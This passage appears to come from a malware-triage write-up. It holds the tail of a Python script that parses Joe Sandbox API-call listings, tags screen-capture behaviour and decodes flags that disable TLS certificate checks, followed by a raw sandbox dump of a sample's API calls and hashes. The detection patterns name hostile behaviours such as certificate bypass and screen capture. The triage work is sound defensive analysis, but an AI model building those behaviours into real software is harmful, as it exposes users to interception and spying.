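• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 008FC533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008FC549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008FC554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008FC584
APIs
• GetDC.USER32(00000000), ref: 009025D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009025E8
  • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0090266D
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009026D0
"""

API_RE = re.compile(r"^•\s+(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})$")

# Public wininet.h values (not taken from the report).
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}

# Illustrative behaviour signatures: a record gets a tag when it calls every
# API in the set. Extend with the sequences your own triage cares about.
SIGNATURES = {
    "screen-capture": {"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"},
    "http-client": {"InternetConnectW", "HttpSendRequestW"},
}


def parse_records(text: str) -> List[List[dict]]:
    """Split the listing at each 'APIs' header into records of direct calls.
    'Part of subcall function' lines describe callees and are skipped."""
    records: List[List[dict]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append([])
            continue
        if not records or "Part of subcall" in line:
            continue
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            records[-1].append({"api": name, "module": module,
                                "args": args.split(","), "ref": int(ref, 16)})
    return records


def decode_security_flags(record: List[dict]) -> List[str]:
    """Name the certificate checks disabled by any
    InternetSetOptionW(h, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4) call.
    Assumption: the value the listing prints in the lpBuffer slot is the
    resolved DWORD, not the pointer itself."""
    names: List[str] = []
    for call in record:
        if call["api"] != "InternetSetOptionW" or len(call["args"]) < 3:
            continue
        try:
            option, value = int(call["args"][1], 16), int(call["args"][2], 16)
        except ValueError:
            continue  # '?' means the sandbox could not recover the argument
        if option == INTERNET_OPTION_SECURITY_FLAGS:
            names += [n for bit, n in SECURITY_FLAGS.items() if value & bit]
    return names


def tag_behaviours(record: List[dict]) -> List[str]:
    """Tags whose full API set appears among the record's direct calls."""
    called = {c["api"] for c in record}
    return sorted(tag for tag, apis in SIGNATURES.items() if apis <= called)


def triage(text: str) -> List[Dict[str, object]]:
    """One summary dict per function record in the listing."""
    out: List[Dict[str, object]] = []
    for rec in parse_records(text):
        out.append({
            "first_ref": rec[0]["ref"] if rec else None,
            "apis": [c["api"] for c in rec],
            "tags": tag_behaviours(rec),
            "tls_checks_ignored": decode_security_flags(rec),
        })
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE):
        first = r["first_ref"]
        label = f"{first:08X}" if isinstance(first, int) else "????????"
        print(f"{label}: {r['tags']} {r['tls_checks_ignored']}")
```

Run it against the whole "APIs" section of a report exported as text and the output becomes a per-function list of behaviour tags keyed by the first call's address, which is what you then cross-reference with the process tree and network sections. The signature table is deliberately small; matching on full API sets rather than single calls keeps a lone GetDC from being reported as a screenshot routine.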
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 008BDAA1
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD659
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD66B
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD67D
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD68F
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6A1
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6B3
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6C5
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6D7
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6E9
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6FB
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD70D
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD71F
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD731
                                      • _free.LIBCMT ref: 008BDA96
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BDAB8
                                      • _free.LIBCMT ref: 008BDACD
                                      • _free.LIBCMT ref: 008BDAD8
                                      • _free.LIBCMT ref: 008BDAFA
                                      • _free.LIBCMT ref: 008BDB0D
                                      • _free.LIBCMT ref: 008BDB1B
                                      • _free.LIBCMT ref: 008BDB26
                                      • _free.LIBCMT ref: 008BDB5E
                                      • _free.LIBCMT ref: 008BDB65
                                      • _free.LIBCMT ref: 008BDB82
                                      • _free.LIBCMT ref: 008BDB9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 3c7b9a7111da753cabaad66ca859c32d0d99fe00c2cb7c0590ce51ce036f91da
                                      • Instruction ID: 679876610363265a5d2ea64d818cef61176d1e2f7c4714e98fe648019951a951
                                      • Opcode Fuzzy Hash: 3c7b9a7111da753cabaad66ca859c32d0d99fe00c2cb7c0590ce51ce036f91da
                                      • Instruction Fuzzy Hash: F0312C71644705BFEB21AA39E845FDABBE9FF10320F154819E449D7392EE31AC448725
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 008E369C
                                      • _wcslen.LIBCMT ref: 008E36A7
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008E3797
                                      • GetClassNameW.USER32(?,?,00000400), ref: 008E380C
                                      • GetDlgCtrlID.USER32(?), ref: 008E385D
                                      • GetWindowRect.USER32(?,?), ref: 008E3882
                                      • GetParent.USER32(?), ref: 008E38A0
                                      • ScreenToClient.USER32(00000000), ref: 008E38A7
                                      • GetClassNameW.USER32(?,?,00000100), ref: 008E3921
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 008E395D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                      • String ID: %s%u
                                      • API String ID: 4010501982-679674701
                                      • Opcode ID: 2acb00c67b75e0538d53b3ace7b23d31af525091f2b7f563922eb5956c71efe7
                                      • Instruction ID: 5a2673dedc5a297b2d058a6e73716a680fa48e7a00d0a4aa59d85be6f28b1131
                                      • Opcode Fuzzy Hash: 2acb00c67b75e0538d53b3ace7b23d31af525091f2b7f563922eb5956c71efe7
                                      • Instruction Fuzzy Hash: F591D171204746AFD718EF26C889BEAB7A8FF46350F008529F999D3191DB30EE45CB91
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 008E4994
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 008E49DA
                                      • _wcslen.LIBCMT ref: 008E49EB
                                      • CharUpperBuffW.USER32(?,00000000), ref: 008E49F7
                                      • _wcsstr.LIBVCRUNTIME ref: 008E4A2C
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 008E4A64
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 008E4A9D
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 008E4AE6
                                      • GetClassNameW.USER32(?,?,00000400), ref: 008E4B20
                                      • GetWindowRect.USER32(?,?), ref: 008E4B8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                      • String ID: ThumbnailClass
                                      • API String ID: 1311036022-1241985126
                                      • Opcode ID: 0b1da71c2ad5746627a08567c02755413e5bfb5697491332b329500ef18b6819
                                      • Instruction ID: 80cc8fd69cd95944f20b86400f7e5fa81ade602913cd5b06c3ed0dbd37f5193d
                                      • Opcode Fuzzy Hash: 0b1da71c2ad5746627a08567c02755413e5bfb5697491332b329500ef18b6819
                                      • Instruction Fuzzy Hash: 5B91EE711082469FDB04DF56C884FAA77E8FF86324F049469FD89DA096DB30ED45CBA2
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0090CC64
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0090CC8D
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0090CD48
                                        • Part of subcall function 0090CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0090CCAA
                                        • Part of subcall function 0090CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0090CCBD
                                        • Part of subcall function 0090CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0090CCCF
                                        • Part of subcall function 0090CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0090CD05
                                        • Part of subcall function 0090CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0090CD28
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0090CCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2734957052-4033151799
                                      • Opcode ID: 337127ed5e4d067ae9bc1252a68191fb25787b7851e9d9efc03930fc7c3c949e
                                      • Instruction ID: e48131fe300328eee3bce47af7d8c4c23913f939a9d1ce399bec2796aa59f11d
                                      • Opcode Fuzzy Hash: 337127ed5e4d067ae9bc1252a68191fb25787b7851e9d9efc03930fc7c3c949e
                                      • Instruction Fuzzy Hash: 3C3161B1A45129BFDB208B94DC88EFFBB7CEF45750F004665B906E2290D7349E45EAA0
                                      APIs
                                      • timeGetTime.WINMM ref: 008EE6B4
                                        • Part of subcall function 0089E551: timeGetTime.WINMM(?,?,008EE6D4), ref: 0089E555
                                      • Sleep.KERNEL32(0000000A), ref: 008EE6E1
                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 008EE705
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008EE727
                                      • SetActiveWindow.USER32 ref: 008EE746
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008EE754
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 008EE773
                                      • Sleep.KERNEL32(000000FA), ref: 008EE77E
                                      • IsWindow.USER32 ref: 008EE78A
                                      • EndDialog.USER32(00000000), ref: 008EE79B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: c7eb7390ab60e7d7f1e1fc8e0f5c8438b99db82e562bce93474dd7e3bc2e9f54
                                      • Instruction ID: b4c69ac434c183c497a4e4d6c9ba4699950539782f56dd0ca62c3a1b597c05c4
                                      • Opcode Fuzzy Hash: c7eb7390ab60e7d7f1e1fc8e0f5c8438b99db82e562bce93474dd7e3bc2e9f54
                                      • Instruction Fuzzy Hash: 192181B036C785AFEB105F26EC89B693B69F75634AF104425F415C21B1DB71AC00EB25
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008EEA5D
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008EEA73
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EEA84
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008EEA96
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008EEAA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2420728520-1007645807
                                      • Opcode ID: bdc0f516e0b3bbe59df6fc6930f2da8237418ab7cc0470c61dc617534b3f3816
                                      • Instruction ID: d43589d2128691948fbbf43f246d37a38fdf02bd1076b584f38a98bdd35b3883
                                      • Opcode Fuzzy Hash: bdc0f516e0b3bbe59df6fc6930f2da8237418ab7cc0470c61dc617534b3f3816
                                      • Instruction Fuzzy Hash: 0611547165026979D730B766DC4ADFF6A7CFBD2B44F000429B401E20D1EAB04A05C6B2
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 008E5CE2
                                      • GetWindowRect.USER32(00000000,?), ref: 008E5CFB
                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008E5D59
                                      • GetDlgItem.USER32(?,00000002), ref: 008E5D69
                                      • GetWindowRect.USER32(00000000,?), ref: 008E5D7B
                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008E5DCF
                                      • GetDlgItem.USER32(?,000003E9), ref: 008E5DDD
                                      • GetWindowRect.USER32(00000000,?), ref: 008E5DEF
                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008E5E31
                                      • GetDlgItem.USER32(?,000003EA), ref: 008E5E44
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008E5E5A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 008E5E67
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: ab57e5a0f902e2b0f8f4899875b699a9923d790a88e9308fb8083955c20f9318
                                      • Instruction ID: 9816faec88fe601aefc7a94dfc97d9cc5a1bcfa6daf3edbc54a4d5710719a3e0
                                      • Opcode Fuzzy Hash: ab57e5a0f902e2b0f8f4899875b699a9923d790a88e9308fb8083955c20f9318
                                      • Instruction Fuzzy Hash: 63513FB0B5060AAFDF18CF69CD89AAEBBB5FB49304F108129F515E7290D770AE00CB50
                                      APIs
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • GetSysColor.USER32(0000000F), ref: 00899862
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 9b897d9e00853d7113078bce80a2274224dcf688230ca7767a9a7e837c886f04
                                      • Instruction ID: 1937afdbb3c5c4b1ba454f3444782ea712dfbbe077d1469f573415367a4c612b
                                      • Opcode Fuzzy Hash: 9b897d9e00853d7113078bce80a2274224dcf688230ca7767a9a7e837c886f04
                                      • Instruction Fuzzy Hash: 6D418E71248644AEDF216F3C9C84BB93B65FB06321F18465DF9E2D62E1E7319841EB11
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,008CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 008E9717
                                      • LoadStringW.USER32(00000000,?,008CF7F8,00000001), ref: 008E9720
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,008CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 008E9742
                                      • LoadStringW.USER32(00000000,?,008CF7F8,00000001), ref: 008E9745
                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 008E9866
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 747408836-2268648507
                                      • Opcode ID: 21d2c3b21e60ed8c9ac223c660b60a0332f662ae5baf350e79807123fb6f7600
                                      • Instruction ID: 0b239099834212698a0bedbdf34eff0d881cf1ceb732891f22e7cff7c3b390fe
                                      • Opcode Fuzzy Hash: 21d2c3b21e60ed8c9ac223c660b60a0332f662ae5baf350e79807123fb6f7600
                                      • Instruction Fuzzy Hash: C9416B72904219AACF04FBE8DD86DEE7778FF56740F140025F201B2092EA756F48CB62
                                      APIs
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008E07A2
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008E07BE
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008E07DA
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008E0804
                                      • CLSIDFromString.COMBASE(?,000001FE), ref: 008E082C
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E0837
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E083C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 323675364-22481851
                                      • Opcode ID: aad39524d4ca667014db9c4f0bdd015fc54dad44be18db205a4ce1cd5b4ca895
                                      • Instruction ID: 355aec2ebb88123a00a81df870648e75bc2ab7c10defd68ec551040de7e5fbd9
                                      • Opcode Fuzzy Hash: aad39524d4ca667014db9c4f0bdd015fc54dad44be18db205a4ce1cd5b4ca895
                                      • Instruction Fuzzy Hash: 5A413A72C10229ABDF15EBA4DC85CEDB778FF08350F054129E911A31A1EB709E44CF91
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00903C5C
                                      • CoInitialize.OLE32(00000000), ref: 00903C8A
                                      • CoUninitialize.COMBASE ref: 00903C94
                                      • _wcslen.LIBCMT ref: 00903D2D
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00903DB1
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00903ED5
                                      • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00903F0E
                                      • CoGetObject.OLE32(?,00000000,0091FB98,?), ref: 00903F2D
                                      • SetErrorMode.KERNEL32(00000000), ref: 00903F40
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00903FC4
                                      • VariantClear.OLEAUT32(?), ref: 00903FD8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                      • String ID:
